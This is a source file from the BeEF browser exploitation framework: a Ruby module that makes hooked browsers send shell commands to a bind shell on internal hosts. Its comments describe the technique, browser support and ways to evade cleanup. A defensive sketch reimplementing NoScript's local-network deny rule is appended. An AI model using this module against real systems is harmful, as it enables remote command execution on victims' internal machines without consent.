beefproject
GitHub Repository: beefproject/beef
Path: blob/master/modules/ipec/inter_protocol_posix_bindshell/module.rb
#
# Copyright (c) 2006-2025 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# [+] Summary:
#
#   Using Inter-protocol Communication (IPC) the zombie browser will send commands to a listening POSIX shell bound on the target specified in the 'Target Address' input. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet.
#
#   The command results are returned to the BeEF control panel.
#
# [+] Tested:
#
#   o Working:
#     o Mozilla Firefox 6
#
#   o Not Working:
#     o Mozilla Firefox 6 with the NoScript extension
#     o Internet Explorer 8+
#     o Chrome 13
#     o Opera 11
#     o Safari 5
#
# [+] Notes:
#
#   o The bindshell is closed once the module has completed. This is necessary otherwise the /bin/sh process will hang. To avoid this issue:
#
#     o remove the last "& exit" portion of the JavaScript payload. Be aware that this will leave redundant /bin/sh processes running on the target system.
#
#   o The NoScript extension for Firefox aborts the request when attempting to access a host on the internal network and displays the following warning:
#
#       [ABE] <LOCAL> Deny on {POST http://localhost:4444/index.html?&/bin/sh&& <<< about:blank - 7}
#       SYSTEM rule:
#       Site LOCAL
#       Accept from LOCAL
#       Deny
#
#   o Internet Explorer is not supported as IE 8+ does not allow posting data to internal network addresses. Earlier versions of IE have not been tested.
#
#   o Returning the shell command results is not supported in Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe. The shell commands are executed on the target shell however.
#
#   o This module is incompatible with autorun. Upon completing the shell commands it will load the original hooked window in a child iframe resulting in an additional hook. This will result in an infinite loop if this module is set to autorun.
#

class Inter_protocol_posix_bindshell < BeEF::Core::Command
  # Module options presented in the BeEF control panel, with their defaults.
  def self.options
    [
      { 'name' => 'ip', 'ui_label' => 'Target Address', 'value' => 'localhost' },
      { 'name' => 'port', 'ui_label' => 'Target Port', 'value' => '4444' },
      { 'name' => 'command_timeout', 'ui_label' => 'Timeout (s)', 'value' => '30' },
      { 'name' => 'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the semicolons are required to separate commands', 'type' => 'textarea',
        'value' => 'echo ID: ; id', 'width' => '200px' },
      { 'name' => 'result_size', 'ui_label' => 'Result Size', 'description' => 'Expected maximum size of the result in bytes', 'value' => '1024' }
    ]
  end

  # Store whatever the hooked browser reported back: a result, a failure, or a default failure message.
  def post_execute
    content = {}
    content['result'] = @datastore['result'] unless @datastore['result'].nil?
    content['fail'] = @datastore['fail'] unless @datastore['fail'].nil?
    content['fail'] = 'No data was returned.' if content.empty?
    save content
  end
end
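
The notes above quote the NoScript ABE SYSTEM rule (Site LOCAL / Accept from LOCAL / Deny) that stops this module's cross-network POST. The sketch below is an added example, not code from BeEF or NoScript, showing how a filtering proxy or browser policy could reach the same decision. The names `LOCAL_RANGES`, `local_host?`, `abe_decision` and `SAMPLE_REQUESTS` are hypothetical, the sample requests are constructed, and hostnames other than `localhost` are assumed to be resolved by the caller.

```ruby
require 'ipaddr'
require 'uri'

# Ranges treated as LOCAL in this sketch: loopback, RFC 1918, link-local,
# IPv6 loopback and IPv6 unique-local addresses.
LOCAL_RANGES = %w[127.0.0.0/8 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16
                  169.254.0.0/16 ::1/128 fc00::/7].map { |cidr| IPAddr.new(cidr) }

# True when the URL's host is "localhost" or an IP literal inside LOCAL_RANGES.
# Other hostnames are not resolved here (assumption: DNS is handled by the caller),
# and URLs without a host, such as about:blank, count as non-local.
def local_host?(url)
  host = URI.parse(url).hostname
  return false if host.nil?
  return true if host.casecmp?('localhost')

  addr = IPAddr.new(host)
  LOCAL_RANGES.any? { |range| range.include?(addr) }
rescue IPAddr::Error, URI::InvalidURIError
  false
end

# Mirrors the quoted rule: it applies only to LOCAL destinations, accepts
# requests that originate from LOCAL, and denies everything else.
def abe_decision(origin_url, destination_url)
  return :accept unless local_host?(destination_url)

  local_host?(origin_url) ? :accept : :deny
end

# Constructed sample requests as [origin, destination] pairs.
SAMPLE_REQUESTS = [
  ['about:blank', 'http://localhost:4444/index.html'],          # shape of the denied request in the notes
  ['http://hooked.example/page', 'http://192.168.1.10:4444/'],  # public page to private subnet
  ['http://192.168.1.5/admin', 'http://192.168.1.10:8080/'],    # LOCAL to LOCAL
  ['http://hooked.example/page', 'http://cdn.example/app.js']   # public to public
].freeze

SAMPLE_REQUESTS.each do |origin, destination|
  puts "#{abe_decision(origin, destination)}  #{origin} -> #{destination}"
end
```
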